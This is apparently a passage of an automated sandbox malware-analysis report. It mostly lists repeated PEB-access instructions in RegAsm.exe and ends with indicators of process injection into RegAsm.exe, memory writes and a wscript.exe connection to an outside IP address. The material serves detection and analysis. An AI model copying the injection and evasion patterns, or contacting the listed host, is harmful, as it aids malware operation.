                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B25E0 mov eax, dword ptr fs:[00000030h]6_2_026B25E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EE5CF mov eax, dword ptr fs:[00000030h]6_2_026EE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EE5CF mov eax, dword ptr fs:[00000030h]6_2_026EE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B65D0 mov eax, dword ptr fs:[00000030h]6_2_026B65D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EA5D0 mov eax, dword ptr fs:[00000030h]6_2_026EA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EA5D0 mov eax, dword ptr fs:[00000030h]6_2_026EA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027305A7 mov eax, dword ptr fs:[00000030h]6_2_027305A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027305A7 mov eax, dword ptr fs:[00000030h]6_2_027305A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027305A7 mov eax, dword ptr fs:[00000030h]6_2_027305A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D45B1 mov eax, dword ptr fs:[00000030h]6_2_026D45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D45B1 mov eax, dword ptr fs:[00000030h]6_2_026D45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E4588 mov eax, dword ptr fs:[00000030h]6_2_026E4588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B2582 mov eax, dword ptr fs:[00000030h]6_2_026B2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B2582 mov ecx, dword ptr fs:[00000030h]6_2_026B2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EE59C mov eax, dword ptr fs:[00000030h]6_2_026EE59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272CA72 mov eax, dword ptr fs:[00000030h]6_2_0272CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272CA72 mov eax, dword ptr fs:[00000030h]6_2_0272CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026ECA6F mov eax, dword ptr fs:[00000030h]6_2_026ECA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026ECA6F mov eax, dword ptr fs:[00000030h]6_2_026ECA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026ECA6F mov eax, dword ptr fs:[00000030h]6_2_026ECA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275EA60 mov eax, dword ptr fs:[00000030h]6_2_0275EA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0A5B mov eax, dword ptr fs:[00000030h]6_2_026C0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0A5B mov eax, dword ptr fs:[00000030h]6_2_026C0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B6A50 mov eax, dword ptr fs:[00000030h]6_2_026B6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B6A50 mov eax, dword ptr fs:[00000030h]6_2_026B6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B6A50 mov eax, dword ptr fs:[00000030h]6_2_026B6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B6A50 mov eax, dword ptr fs:[00000030h]6_2_026B6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B6A50 mov eax, dword ptr fs:[00000030h]6_2_026B6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B6A50 mov eax, dword ptr fs:[00000030h]6_2_026B6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B6A50 mov eax, dword ptr fs:[00000030h]6_2_026B6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DEA2E mov eax, dword ptr fs:[00000030h]6_2_026DEA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026ECA24 mov eax, dword ptr fs:[00000030h]6_2_026ECA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D4A35 mov eax, dword ptr fs:[00000030h]6_2_026D4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D4A35 mov eax, dword ptr fs:[00000030h]6_2_026D4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273CA11 mov eax, dword ptr fs:[00000030h]6_2_0273CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EAAEE mov eax, dword ptr fs:[00000030h]6_2_026EAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EAAEE mov eax, dword ptr fs:[00000030h]6_2_026EAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B0AD0 mov eax, dword ptr fs:[00000030h]6_2_026B0AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02706ACC mov eax, dword ptr fs:[00000030h]6_2_02706ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02706ACC mov eax, dword ptr fs:[00000030h]6_2_02706ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02706ACC mov eax, dword ptr fs:[00000030h]6_2_02706ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E4AD0 mov eax, dword ptr fs:[00000030h]6_2_026E4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E4AD0 mov eax, dword ptr fs:[00000030h]6_2_026E4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B8AA0 mov eax, dword ptr fs:[00000030h]6_2_026B8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B8AA0 mov eax, dword ptr fs:[00000030h]6_2_026B8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02706AA4 mov eax, dword ptr fs:[00000030h]6_2_02706AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BEA80 mov eax, dword ptr fs:[00000030h]6_2_026BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BEA80 mov eax, dword ptr fs:[00000030h]6_2_026BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BEA80 mov eax, dword ptr fs:[00000030h]6_2_026BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BEA80 mov eax, dword ptr fs:[00000030h]6_2_026BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BEA80 mov eax, dword ptr fs:[00000030h]6_2_026BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BEA80 mov eax, dword ptr fs:[00000030h]6_2_026BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BEA80 mov eax, dword ptr fs:[00000030h]6_2_026BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BEA80 mov eax, dword ptr fs:[00000030h]6_2_026BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BEA80 mov eax, dword ptr fs:[00000030h]6_2_026BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02784A80 mov eax, dword ptr fs:[00000030h]6_2_02784A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E8A90 mov edx, dword ptr fs:[00000030h]6_2_026E8A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026ACB7E mov eax, dword ptr fs:[00000030h]6_2_026ACB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275EB50 mov eax, dword ptr fs:[00000030h]6_2_0275EB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02746B40 mov eax, dword ptr fs:[00000030h]6_2_02746B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02746B40 mov eax, dword ptr fs:[00000030h]6_2_02746B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277AB40 mov eax, dword ptr fs:[00000030h]6_2_0277AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02758B42 mov eax, dword ptr fs:[00000030h]6_2_02758B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02764B4B mov eax, dword ptr fs:[00000030h]6_2_02764B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02764B4B mov eax, dword ptr fs:[00000030h]6_2_02764B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DEB20 mov eax, dword ptr fs:[00000030h]6_2_026DEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DEB20 mov eax, dword ptr fs:[00000030h]6_2_026DEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02778B28 mov eax, dword ptr fs:[00000030h]6_2_02778B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02778B28 mov eax, dword ptr fs:[00000030h]6_2_02778B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272EB1D mov eax, dword ptr fs:[00000030h]6_2_0272EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272EB1D mov eax, dword ptr fs:[00000030h]6_2_0272EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272EB1D mov eax, dword ptr fs:[00000030h]6_2_0272EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272EB1D mov eax, dword ptr fs:[00000030h]6_2_0272EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272EB1D mov eax, dword ptr fs:[00000030h]6_2_0272EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272EB1D mov eax, dword ptr fs:[00000030h]6_2_0272EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272EB1D mov eax, dword ptr fs:[00000030h]6_2_0272EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272EB1D mov eax, dword ptr fs:[00000030h]6_2_0272EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272EB1D mov eax, dword ptr fs:[00000030h]6_2_0272EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273CBF0 mov eax, dword ptr fs:[00000030h]6_2_0273CBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DEBFC mov eax, dword ptr fs:[00000030h]6_2_026DEBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B8BF0 mov eax, dword ptr fs:[00000030h]6_2_026B8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B8BF0 mov eax, dword ptr fs:[00000030h]6_2_026B8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B8BF0 mov eax, dword ptr fs:[00000030h]6_2_026B8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275EBD0 mov eax, dword ptr fs:[00000030h]6_2_0275EBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B0BCD mov eax, dword ptr fs:[00000030h]6_2_026B0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B0BCD mov eax, dword ptr fs:[00000030h]6_2_026B0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B0BCD mov eax, dword ptr fs:[00000030h]6_2_026B0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D0BCB mov eax, dword ptr fs:[00000030h]6_2_026D0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D0BCB mov eax, dword ptr fs:[00000030h]6_2_026D0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D0BCB mov eax, dword ptr fs:[00000030h]6_2_026D0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02764BB0 mov eax, dword ptr fs:[00000030h]6_2_02764BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02764BB0 mov eax, dword ptr fs:[00000030h]6_2_02764BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0BBE mov eax, dword ptr fs:[00000030h]6_2_026C0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0BBE mov eax, dword ptr fs:[00000030h]6_2_026C0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273E872 mov eax, dword ptr fs:[00000030h]6_2_0273E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273E872 mov eax, dword ptr fs:[00000030h]6_2_0273E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02746870 mov eax, dword ptr fs:[00000030h]6_2_02746870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02746870 mov eax, dword ptr fs:[00000030h]6_2_02746870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C2840 mov ecx, dword ptr fs:[00000030h]6_2_026C2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B4859 mov eax, dword ptr fs:[00000030h]6_2_026B4859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B4859 mov eax, dword ptr fs:[00000030h]6_2_026B4859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E0854 mov eax, dword ptr fs:[00000030h]6_2_026E0854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275483A mov eax, dword ptr fs:[00000030h]6_2_0275483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275483A mov eax, dword ptr fs:[00000030h]6_2_0275483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D2835 mov eax, dword ptr fs:[00000030h]6_2_026D2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D2835 mov eax, dword ptr fs:[00000030h]6_2_026D2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D2835 mov eax, dword ptr fs:[00000030h]6_2_026D2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D2835 mov ecx, dword ptr fs:[00000030h]6_2_026D2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D2835 mov eax, dword ptr fs:[00000030h]6_2_026D2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D2835 mov eax, dword ptr fs:[00000030h]6_2_026D2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EA830 mov eax, dword ptr fs:[00000030h]6_2_026EA830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273C810 mov eax, dword ptr fs:[00000030h]6_2_0273C810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277A8E4 mov eax, dword ptr fs:[00000030h]6_2_0277A8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EC8F9 mov eax, dword ptr fs:[00000030h]6_2_026EC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EC8F9 mov eax, dword ptr fs:[00000030h]6_2_026EC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DE8C0 mov eax, dword ptr fs:[00000030h]6_2_026DE8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B0887 mov eax, dword ptr fs:[00000030h]6_2_026B0887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273C89D mov eax, dword ptr fs:[00000030h]6_2_0273C89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F096E mov eax, dword ptr fs:[00000030h]6_2_026F096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F096E mov edx, dword ptr fs:[00000030h]6_2_026F096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F096E mov eax, dword ptr fs:[00000030h]6_2_026F096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02754978 mov eax, dword ptr fs:[00000030h]6_2_02754978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02754978 mov eax, dword ptr fs:[00000030h]6_2_02754978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D6962 mov eax, dword ptr fs:[00000030h]6_2_026D6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D6962 mov eax, dword ptr fs:[00000030h]6_2_026D6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D6962 mov eax, dword ptr fs:[00000030h]6_2_026D6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273C97C mov eax, dword ptr fs:[00000030h]6_2_0273C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02730946 mov eax, dword ptr fs:[00000030h]6_2_02730946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273892A mov eax, dword ptr fs:[00000030h]6_2_0273892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0274892B mov eax, dword ptr fs:[00000030h]6_2_0274892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273C912 mov eax, dword ptr fs:[00000030h]6_2_0273C912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026A8918 mov eax, dword ptr fs:[00000030h]6_2_026A8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026A8918 mov eax, dword ptr fs:[00000030h]6_2_026A8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272E908 mov eax, dword ptr fs:[00000030h]6_2_0272E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272E908 mov eax, dword ptr fs:[00000030h]6_2_0272E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273E9E0 mov eax, dword ptr fs:[00000030h]6_2_0273E9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E29F9 mov eax, dword ptr fs:[00000030h]6_2_026E29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E29F9 mov eax, dword ptr fs:[00000030h]6_2_026E29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277A9D3 mov eax, dword ptr fs:[00000030h]6_2_0277A9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027469C0 mov eax, dword ptr fs:[00000030h]6_2_027469C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA9D0 mov eax, dword ptr fs:[00000030h]6_2_026BA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA9D0 mov eax, dword ptr fs:[00000030h]6_2_026BA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA9D0 mov eax, dword ptr fs:[00000030h]6_2_026BA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA9D0 mov eax, dword ptr fs:[00000030h]6_2_026BA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA9D0 mov eax, dword ptr fs:[00000030h]6_2_026BA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BA9D0 mov eax, dword ptr fs:[00000030h]6_2_026BA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E49D0 mov eax, dword ptr fs:[00000030h]6_2_026E49D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027389B3 mov esi, dword ptr fs:[00000030h]6_2_027389B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027389B3 mov eax, dword ptr fs:[00000030h]6_2_027389B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027389B3 mov eax, dword ptr fs:[00000030h]6_2_027389B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B09AD mov eax, dword ptr fs:[00000030h]6_2_026B09AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B09AD mov eax, dword ptr fs:[00000030h]6_2_026B09AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C29A0 mov eax, dword ptr fs:[00000030h]6_2_026C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C29A0 mov eax, dword ptr fs:[00000030h]6_2_026C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C29A0 mov eax, dword ptr fs:[00000030h]6_2_026C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C29A0 mov eax, dword ptr fs:[00000030h]6_2_026C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C29A0 mov eax, dword ptr fs:[00000030h]6_2_026C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C29A0 mov eax, dword ptr fs:[00000030h]6_2_026C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C29A0 mov eax, dword ptr fs:[00000030h]6_2_026C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C29A0 mov eax, dword ptr fs:[00000030h]6_2_026C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C29A0 mov eax, dword ptr fs:[00000030h]6_2_026C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C29A0 mov eax, dword ptr fs:[00000030h]6_2_026C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C29A0 mov eax, dword ptr fs:[00000030h]6_2_026C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C29A0 mov eax, dword ptr fs:[00000030h]6_2_026C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C29A0 mov eax, dword ptr fs:[00000030h]6_2_026C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02730E7F mov eax, dword ptr fs:[00000030h]6_2_02730E7F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02730E7F mov eax, dword ptr fs:[00000030h]6_2_02730E7F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02730E7F mov eax, dword ptr fs:[00000030h]6_2_02730E7F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B6E71 mov eax, dword ptr fs:[00000030h]6_2_026B6E71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02782E4F mov eax, dword ptr fs:[00000030h]6_2_02782E4F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02782E4F mov eax, dword ptr fs:[00000030h]6_2_02782E4F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02746E20 mov eax, dword ptr fs:[00000030h]6_2_02746E20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02746E20 mov eax, dword ptr fs:[00000030h]6_2_02746E20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02746E20 mov ecx, dword ptr fs:[00000030h]6_2_02746E20
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\System32\wscript.exeNetwork Connect: 108.181.20.35 443Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
